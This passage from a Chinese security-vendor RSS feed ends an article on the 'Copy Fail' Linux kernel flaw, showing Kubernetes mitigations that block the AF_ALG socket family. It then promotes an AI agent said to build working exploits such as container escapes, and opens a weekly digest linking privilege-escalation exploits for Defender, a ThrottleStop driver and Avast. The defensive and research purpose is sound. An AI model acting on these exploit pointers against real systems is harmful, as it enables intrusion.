12px;">}</span></span></span></code></pre><h3 data-sourcepos="100:1-100:32" style="font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;white-space: normal;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;box-sizing: border-box;margin-top: 0px;margin-bottom: 1rem;caret-color: rgb(51, 51, 51);color: rgb(51, 51, 51);font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;"><span leaf="" style="font-style: normal;font-variant-caps: normal;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;box-sizing: border-box;font-weight: 600;line-height: 1.25;font-size: 1.25rem;color: rgb(102, 204, 204);font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;"><span textstyle="" style="font-size: 16px;color: rgb(26, 36, 51);">Kubernetes 缓解措施</span></span></h3><pre data-sourcepos="102:1-111:3" tabindex="0" style="white-space:pre-wrap;box-sizing: border-box;font-family: Consolas, Monaco, &#34;Andale Mono&#34;, &#34;Ubuntu Mono&#34;, monospace;font-size: 13.6px;margin: 0.5rem 0px;overflow-wrap: normal;padding: 1rem;overflow: auto;line-height: 1.45;background: rgb(247, 248, 248);border-radius: 0.1875rem;color: black;text-align: left;word-spacing: normal;word-break: normal;tab-size: 4;hyphens: none;"><code style="white-space:pre-wrap;box-sizing: border-box;font-family: Consolas, Monaco, &#34;Andale Mono&#34;, &#34;Ubuntu Mono&#34;, monospace;font-size: 13.6px;padding: 0px;margin: 0px;background-color: initial;color: rgb(9, 132, 79);border-radius: 0.1875rem;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;text-align: left;word-spacing: normal;word-break: normal;overflow-wrap: normal;tab-size: 4;hyphens: none;border: 0px;display: inline;overflow: visible;line-height: inherit;"><span style="box-sizing: border-box;color: rgb(142, 156, 146);"><span leaf=""><span textstyle="" style="font-size: 12px;"># Pod Security Policy (PSP) / OPA 策略</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(188, 49, 156);"><span leaf=""><span textstyle="" style="font-size: 12px;">apiVersion</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">:</span></span></span><span leaf=""><span textstyle="" style="font-size: 12px;"> constraints.gatekeeper.sh/v1beta1</span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(188, 49, 156);"><span leaf=""><span textstyle="" style="font-size: 12px;">kind</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">:</span></span></span><span leaf=""><span textstyle="" style="font-size: 12px;"> K8sBlockAFALG</span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(188, 49, 156);"><span leaf=""><span textstyle="" style="font-size: 12px;">spec</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">:</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(188, 49, 156);"><span leaf=""><span textstyle="" style="font-size: 12px;">    match</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">:</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(188, 49, 156);"><span leaf=""><span textstyle="" style="font-size: 12px;">        kinds</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">:</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">[</span></span></span><span style="box-sizing: border-box;color: rgb(211, 45, 38);"><span leaf=""><span textstyle="" style="font-size: 12px;">&#34;Pod&#34;</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">]</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(188, 49, 156);"><span leaf=""><span textstyle="" style="font-size: 12px;">    parameters</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">:</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(188, 49, 156);"><span leaf=""><span textstyle="" style="font-size: 12px;">        denySocketFamily</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">:</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">38</span></span></span><span style="box-sizing: border-box;color: rgb(142, 156, 146);"><span leaf=""><span textstyle="" style="font-size: 12px;"># AF_ALG</span></span></span></code></pre><pre data-sourcepos="113:1-124:3" tabindex="0" style="white-space:pre-wrap;box-sizing: border-box;font-family: Consolas, Monaco, &#34;Andale Mono&#34;, &#34;Ubuntu Mono&#34;, monospace;font-size: 13.6px;margin: 0.5rem 0px;overflow-wrap: normal;padding: 1rem;overflow: auto;line-height: 1.45;background: rgb(247, 248, 248);border-radius: 0.1875rem;color: black;text-align: left;word-spacing: normal;word-break: normal;tab-size: 4;hyphens: none;"><code style="white-space:pre-wrap;box-sizing: border-box;font-family: Consolas, Monaco, &#34;Andale Mono&#34;, &#34;Ubuntu Mono&#34;, monospace;font-size: 13.6px;padding: 0px;margin: 0px;background-color: initial;color: rgb(9, 132, 79);border-radius: 0.1875rem;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;text-align: left;word-spacing: normal;word-break: normal;overflow-wrap: normal;tab-size: 4;hyphens: none;border: 0px;display: inline;overflow: visible;line-height: inherit;"><span style="box-sizing: border-box;color: rgb(142, 156, 146);"><span leaf=""><span textstyle="" style="font-size: 12px;"># 避免使用相同基础镜像的敏感 Pod 共置</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(142, 156, 146);"><span leaf=""><span textstyle="" style="font-size: 12px;"># 使用 nodeSelector / podAntiAffinity 隔离</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(188, 49, 156);"><span leaf=""><span textstyle="" style="font-size: 12px;">spec</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">:</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(188, 49, 156);"><span leaf=""><span textstyle="" style="font-size: 12px;">    affinity</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">:</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(188, 49, 156);"><span leaf=""><span textstyle="" style="font-size: 12px;">        podAntiAffinity</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">:</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(188, 49, 156);"><span leaf=""><span textstyle="" style="font-size: 12px;">            requiredDuringSchedulingIgnoredDuringExecution</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">:</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">            -</span></span></span><span style="box-sizing: border-box;color: rgb(188, 49, 156);"><span leaf=""><span textstyle="" style="font-size: 12px;">labelSelector</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">:</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(188, 49, 156);"><span leaf=""><span textstyle="" style="font-size: 12px;">                matchLabels</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">:</span></span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(188, 49, 156);"><span leaf=""><span textstyle="" style="font-size: 12px;">                    app</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">:</span></span></span><span leaf=""><span textstyle="" style="font-size: 12px;"> sensitive</span></span><span leaf=""><br/></span><span style="box-sizing: border-box;color: rgb(188, 49, 156);"><span leaf=""><span textstyle="" style="font-size: 12px;">             topologyKey</span></span></span><span style="box-sizing: border-box;color: rgb(40, 52, 206);"><span leaf=""><span textstyle="" style="font-size: 12px;">:</span></span></span><span leaf=""><span textstyle="" style="font-size: 12px;"> kubernetes.io/hostname</span></span></code></pre></p><div style="letter-spacing: normal;text-align: start;white-space: normal;"><h3 data-sourcepos="126:1-126:54" style="font-style: normal;font-variant-caps: normal;letter-spacing: normal;text-align: start;text-indent: 0px;text-transform: none;white-space: normal;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;box-sizing: border-box;margin-top: 1.5rem;margin-bottom: 1rem;font-weight: 600;line-height: 1.25;font-size: 1.25rem;color: rgb(102, 204, 204);font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;"><span leaf=""><span textstyle="" style="font-size: 18px;color: rgb(42, 55, 72);">写在最后：AI重新定义漏洞研究的边界</span></span></h3><p data-sourcepos="127:1-128:80" style="caret-color: rgb(204, 204, 204);color: rgb(204, 204, 204);font-size: 16px;letter-spacing: normal;text-align: justify;white-space: normal;margin: 0px;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;"><span leaf="" style="caret-color: rgb(204, 204, 204);text-align: justify;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;">Copy Fail漏洞的公开，让我们再次审视Linux内核安全的复杂性——三个看似合理的优化，在十年间悄然叠加，最终酿成通杀全平台的灾难。</span><span leaf=""><br/></span><span leaf="" style="caret-color: rgb(204, 204, 204);text-align: justify;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;">而更重要的是，这次事件揭示了AI在漏洞研究中的角色跃迁：</span></p><ul style="font-size: 16px;font-style: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: auto;text-align: start;text-indent: 0px;text-transform: none;white-space: normal;widows: auto;word-spacing: 0px;-webkit-text-stroke-width: 0px;text-decoration: none;box-sizing: border-box;padding-left: 2rem;margin-top: 0px;caret-color: rgb(51, 51, 51);color: rgb(51, 51, 51);font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;margin-bottom: 0px !important;" class="list-paddingleft-1"><li style="box-sizing: border-box;"><p><span leaf=""><span textstyle="" style="font-weight: bold;">从&#34;辅助发现&#34;到&#34;自主研究&#34;：</span>不再仅仅是扫描代码缺陷，而是理解漏洞原理、推导攻击场景、生成可用武器</span></p></li><li style="box-sizing: border-box;margin-top: 0.25rem;"><p><span leaf=""><span textstyle="" style="font-weight: bold;">从&#34;跟随公开&#34;到&#34;引领未知&#34;：</span>在无公开细节的领域（如本次容器逃逸），AI可以率先突破</span></p></li><li style="box-sizing: border-box;margin-top: 0.25rem;"><p><span leaf=""><span textstyle="" style="font-weight: bold;">从&#34;工具&#34;到&#34;研究员&#34;：</span>具备独立的安全研究思维链，能够在复杂约束条件下构造端到端攻击</span></p></li></ul><div style="font-size: 16px;"><div style="letter-spacing: normal;text-align: start;white-space: normal;"><p style="caret-color: rgb(204, 204, 204);color: rgb(204, 204, 204);font-size: 16px;letter-spacing: normal;text-align: justify;white-space: normal;margin: 0px;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;" data-pm-slice="2 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size: 16px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: normal;text-align: start;white-space: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span leaf="" style="color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;">绿盟科技ApexEye漏洞研究智能体采用了专为漏洞挖掘、漏洞验证任务定制的Meta-Agent分层协作多智能体框架，内部设计了覆盖不同场景的Cluster多簇分析智能体，采用Nexus Core Meta-Agent全局调度、</span><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-size: 16px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;letter-spacing: normal;text-align: start;white-space: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;&#34;}]" style="color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;">跨Cluster协商任务协同以及策略自进化等机制，具备1、深层潜在漏洞挖掘能力，跨文件、跨模块、跨环境穿透能力；2、组合漏洞的攻击链串联能力；3、提升潜在安全影响的可见性，精细挖掘、多重验证，低漏报率、低误报率等特性。</span></p></div></div><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.525" data-s="300,640" data-type="png" data-w="1080" type="block" data-imgfileid="100011365" src="https://wechat2rss.xlab.app/img-proxy/?k=f63a7307&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jCm52uUtLibVPVOSiajKJ4lO8bVkdTmoZI7ZRaoMQialN1xEOY6oWNpP9b4ibdNJjCdJVfaMibialT1Hshu1NSt3Et7TgUtPakgmR95eo%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="caret-color: rgb(204, 204, 204);color: rgb(204, 204, 204);font-size: 16px;letter-spacing: normal;text-align: justify;white-space: normal;margin: 0px;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;"><span leaf="" style="caret-color: rgb(204, 204, 204);text-align: justify;font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;line-height: 2.2em;text-indent: 0em;color: rgb(71, 71, 71);font-size: 16px;letter-spacing: normal;text-decoration: none;"><span textstyle="" style="color: rgb(71, 138, 57);font-weight: bold;">在AI与安全的深水区，我们正游向更深处。</span></span></p></div><div style="margin: 54px 0% 10px;text-align: center;justify-content: center;display: flex;flex-flow: row nowrap;" powered-by="xiumi.us"><div style="display: inline-block;border-style: solid;border-width: 2px;border-color: rgb(67, 146, 117);width: 95%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;"><div style="font-size: 11px;margin-top: -44px;margin-right: 0%;margin-left: 0%;" powered-by="xiumi.us"><div style="width: 7em;height: 7em;display: inline-block;vertical-align: middle;border-radius: 100%;background-color: rgb(255, 255, 255);margin-right: -2.18em;margin-left: -2.2em;"><div style="width: 6em;height: 6em;margin: 0.5em auto;border-radius: 100%;background-position: center center;background-repeat: no-repeat;background-size: cover;overflow: hidden;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=7f1677a5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FTPGibEO8KBwZycJ3iaJ5fzjj0gHPgYicAdCSfYQqFmSxla4YSiaPtOjxqB0yxIjZibAFQRXFXGibMLx94icqAE94ev2pg%2F640%3Fwx_fmt%3Dpng&#34;);"><p style="width: 100%;height: 100%;overflow: hidden;line-height: 0;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.9950248756218906" data-type="png" data-w="402" style="width: 100%;height: 100%;opacity: 0;" src="https://wechat2rss.xlab.app/img-proxy/?k=7f1677a5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FTPGibEO8KBwZycJ3iaJ5fzjj0gHPgYicAdCSfYQqFmSxla4YSiaPtOjxqB0yxIjZibAFQRXFXGibMLx94icqAE94ev2pg%2F640%3Fwx_fmt%3Dpng"/></p></div></div></div><div style="justify-content: center;display: flex;flex-flow: row nowrap;" powered-by="xiumi.us"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 10px 10px 20px;align-self: flex-start;flex: 0 0 auto;"><div style="font-size: 14px;text-align: justify;line-height: 2;padding-right: 10px;padding-left: 10px;" powered-by="xiumi.us"><p style="white-space: normal;"><strong><span leaf="">绿盟科技M01N战队</span><span leaf=""><span textstyle="" style="font-weight: normal;">以“研战一体，以攻促防”为核心理念，持续深耕WEB安全、终端安全、云安全、身份安全等传统核心阵地，更重点攻关大模型安全、智能化网络威胁以及AI赋能的新型网络攻防，旨在将AI的颠覆性潜力转化为防御者的战略优势，为关键信息基础设施与数字社会应对日益复杂和智能化的网络威胁，提供基于实证的洞察、技术与解决方案。</span></span></strong></p></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=546cd661&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzkyMTI0NjA3OA%3D%3D%26mid%3D2247495017%26idx%3D1%26sn%3D21e245531ce13c5507dd18dc05bd3663">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sat, 02 May 2026 12:40:00 +0800</pubDate>
    </item>
    <item>
      <title>每周蓝军技术推送（2026.4.18-5.1）</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247495007&amp;idx=1&amp;sn=498f79f86d05ce3ce50d17af257ded42</link>
      <description>关注高级攻防对抗技术热点，研究对手技术进行高级威胁模拟，研判攻击安全发展方向。</description>
      <content:encoded><![CDATA[<p>原创 <span>天元实验室</span> <span>2026-05-01 18:01</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=f7acde9a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FuZT6kWW1jCmbbXCQHfrQX5MIIXlibR0rTEB9ExqXMZvTB2TicvGRicAnMbibmCMibM3I5nMm0dMDbAQ78dzAva8hgia3nZFnZcU7nnlAAruWPgkvo%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>关注高级攻防对抗技术热点，研究对手技术进行高级威胁模拟，研判攻击安全发展方向。</p>
  <div style="line-height: 1.6;letter-spacing: 0px;padding-right: 0px;padding-left: 0px;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4222222222222222" data-s="300,640" data-type="png" data-w="900" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011358" src="https://wechat2rss.xlab.app/img-proxy/?k=7855cc82&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jCmoyJQgT39toVIBK72h1wziaEyCgXWbmmwCZ2icu8iayN2jXfPeRia5LA3MoKbREj2J0DVUaXfpdo2Q4j6MmYua4hNicmSIg1vdYAg8%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Web安全</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">WordPress插件存在访问控制失效，未认证者可复用Nonce补漏邮件发送功能</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.exploit-db.com/exploits/52511" target="_blank">https://www.exploit-db.com/exploits/52511</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">终端对抗</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">披露Defender RedSun漏洞，低权用户可直接提权至SYSTEM</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://blog.qualys.com/product-tech/vulnmgmt-detection-response" target="_blank">https://blog.qualys.com/product-tech/vulnmgmt-detection-response</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞相关</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">公开Throttlestop驱动越界写提权利用，影响Windows 11，涉及CVE-2025-7771</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.exploit-db.com/exploits/52512" target="_blank">https://www.exploit-db.com/exploits/52512</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AVAST 25.11未引用服务路径漏洞允许本地用户提权</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.exploit-db.com/exploits/52510" target="_blank">https://www.exploit-db.com/exploits/52510</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: 